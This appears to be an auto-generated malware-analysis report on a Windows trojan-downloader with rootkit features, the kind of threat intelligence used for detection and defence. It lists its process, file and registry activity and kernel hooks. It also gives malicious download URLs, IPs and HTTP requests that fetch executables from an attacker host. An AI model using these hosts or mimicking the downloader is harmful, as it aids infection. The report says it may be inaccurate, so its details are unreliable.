Trojan.Agent.AQSI_0e035b78e9

by malwarelabrobot on October 23rd, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Geral.ssc (Kaspersky), Trojan.Agent.AQSI (B) (Emsisoft), Trojan.Agent.AQSI (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 0e035b78e94e2e4f1ff3db390148d1cc
SHA1: 00037ae1265de8536a1bbcf680475663aa648b81
SHA256: 8edcc5c35a38e58bf46384bac2e65e32cb11fc2bb047ac4d50ce630ba9d420ae
SSDeep: 768:17ugUsUymtvYGYXQQYKeYkNM rZOgk2pfArfiS3 :1CQULBYG4QQY9YYM EZAE/
Size: 37473 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: WinUpackv030beta, Upackv032BetaPatch, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 1970-01-01 03:00:00
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

sc.exe:612
sc.exe:1572
sc.exe:1776
OneG2190828.exe:1548
runonce.exe:340

The Trojan injects its code into the following process(es):

%original file name%.exe:1696
cc2178718.exe:744

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
ShimCacheMutex
LDMMOO.

File activity

The process %original file name%.exe:1696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
%System%\wbem\Logs (4 bytes)
%WinDir%\inf\oem10.inf (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (8 bytes)
%Documents and Settings%\%current user%\Local Settings (8 bytes)
%WinDir%\5717.mp4 (58 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
%Documents and Settings%\All Users (4 bytes)
%WinDir% (192 bytes)
C:\$Directory (12 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%System%\jsseting.data (16 bytes)
%System% (1920 bytes)
%System%\config\SysEvent.Evt (168 bytes)
%Program Files%\RAV\CCtest.inf (4 bytes)
C:\PROGRAM FILES (96 bytes)
%Program Files%\RAV\CCtest.sys (7 bytes)
%System%\drivers\pcidump.sys (11 bytes)
%System%\config (96 bytes)
%WinDir%\inf\oem10.PNF (18746 bytes)
%System%\drivers (96 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Program Files%\RAV\CCtest.dll (10 bytes)
%WinDir%\setupapi.log (32472 bytes)
%System%\drivers\SET41.tmp (7 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)

The Trojan deletes the following file(s):

%WinDir%\5717.mp4 (0 bytes)
%Program Files%\RAV\CCtest.inf (0 bytes)
%Program Files%\RAV\CCtest.dll (0 bytes)
%System%\drivers\SET41.tmp (0 bytes)
%Program Files%\RAV\CCtest.sys (0 bytes)
%System%\drivers\pcidump.sys (0 bytes)
%System%\jsseting.data (0 bytes)

The process OneG2190828.exe:1548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\Rwmltcy.cc3 (75 bytes)

The process cc2178718.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (0 bytes)

Registry activity

The process sc.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B4 1A 1A 7A 81 93 86 56 61 73 80 FD 3F 70 C0"

The process sc.exe:1572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 43 C2 7B 8E AF 29 D3 B4 4E 69 B7 F8 AE 40 13"

The process sc.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 42 FB 27 21 A0 A2 40 76 B2 96 35 E3 11 92 00"

The process %original file name%.exe:1696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"MatchingDeviceId" = "*cctestdevice"
"InfSection" = "CCTest_DDI"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Icon" = "-18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfPath" = "oem10.inf"
"ProviderName" = "Microsoft"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Class" = "CCTest"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"(Default)" = "Class for CCTest devices"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"Extended Base" = "05 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfSectionExt" = ".NT"
"DriverVersion" = "1.0.0.0"

"DriverDate" = "5-7-2010"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 AE 9A 60 EF 5E 99 54 75 F5 A9 19 8E C2 4F B3"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDateData" = "00 80 7A 3C 78 ED CA 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDesc" = "CCTest Device"

The Trojan modifies the IE security-zone settings so that all local web nodes with no dots in their names, which do not otherwise belong to any zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

The process runonce.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 BD EA 62 6F C9 3F 6C E9 C7 79 83 FE 20 A1 60"

Dropped PE files

MD5 File path
2c2b4c8ad5022846aa424076a31c961c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cc2178718.exe
23de22dc74b2878b72fc1e71f6026d5f c:\WINDOWS\system32\Rwmltcy.cc3
62a291ddfc8d86b4164d195211cf90d9 c:\WINDOWS\system32\drivers\CCTest.sys
add4832059173fcdb135d949194ad52b c:\WINDOWS\system32\jsseting.data

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwQuerySystemInformation

Using the driver "%System%\drivers\pcidump.sys", the Trojan replaces IRP handlers in the NTFS file system driver to control file operations:

MJ_CREATE

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.Upack 4096 139264 512 1.96068 f92dea8a39a051133c79752ab6289945
.rsrc 143360 69632 36961 5.5417 406e6de271cf332038f71d0543efba3a

Dropped from:

Downloaded by:

0e035b78e94e2e4f1ff3db390148d1cc

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://s-56350.gotocdn.com/templates/6000.exe
hxxp://s-56350.gotocdn.com/templates/sc.exe
hxxp://www.gaopinhanhsteel.com/templates/sc.exe 113.10.149.127
hxxp://www.gaopinhanhsteel.com/templates/6000.exe 113.10.149.127
mateng1761.f3322.org 42.51.155.159


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /templates/6000.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:30 GMT
Content-Length: 37473
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/6000.exe
Last-Modified: Wed, 17 Sep 2014 15:03:36 GMT
Accept-Ranges: bytes
ETag: "996a9f8e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<<< skipped >>>

GET /templates/sc.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:34 GMT
Content-Length: 78848
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/sc.exe
Last-Modified: Wed, 17 Sep 2014 15:03:10 GMT
Accept-Ranges: bytes
ETag: "535efc7e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_1696:

MZKERNEL32.DLL
.Upack
.rsrc
.data
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,%DeviceClassName%
1 = %DiskId1%,,,""
CCTest.sys = 1,,
%CCTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,%CCTest_DeviceDesc%
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = %CCTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
.text
h.data
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ntoskrnl.exe
HAL.dll
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
USER32.dll
RegCloseKey
RegCreateKeyA
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
advapi32.dll
kdll.dll
setupapi.dll
shell32.dll
reg.exe
import
\5717.mp4
jsseting.data
%scc%d.exe
KERNEL32.DLL
GetCPInfo
USER32.DLL
SETUPAPI.DLL
w.Nps
B).pA)
7Vn%c:
83.XW
u%u#@
JNh.VV{
U%UR]
Windows NT\
Image File Execution Options\
svchost.exe
CCTest.sys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"

%original file name%.exe_1696_rwx_00401000_00022000:

.data
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,%DeviceClassName%
1 = %DiskId1%,,,""
CCTest.sys = 1,,
%CCTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,%CCTest_DeviceDesc%
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = %CCTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
.text
h.data
.rsrc
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ntoskrnl.exe
HAL.dll
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
USER32.dll
RegCloseKey
RegCreateKeyA
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
advapi32.dll
kdll.dll
setupapi.dll
shell32.dll
reg.exe
import
\5717.mp4
jsseting.data
%scc%d.exe
KERNEL32.DLL
GetCPInfo
USER32.DLL
SETUPAPI.DLL
Windows NT\
Image File Execution Options\
svchost.exe
CCTest.sys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"

%original file name%.exe_1696_rwx_00EA1000_00004000:

.text
h.rdata
H.data
.reloc
**************** Modified with PEditor 1.7 by yoda & M.o.D. -> come.to/f2f ****************
D:\DirectDiskForWin32\KillProcess\objfre_wxp_x86\i386\pcidump.pdb
ntoskrnl.exe
HAL.dll
\??\c:\%original file name%.exe
\??\%WinDir%\Explorer.EXE
ers\gm.dls
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
\DosDevices\Scsi%d:

cc2178718.exe_744:

.text
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyA
ADVAPI32.dll
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll

cc2178718.exe_744_rwx_00400000_00001000:

.text
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh

svchost.exe_1236:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
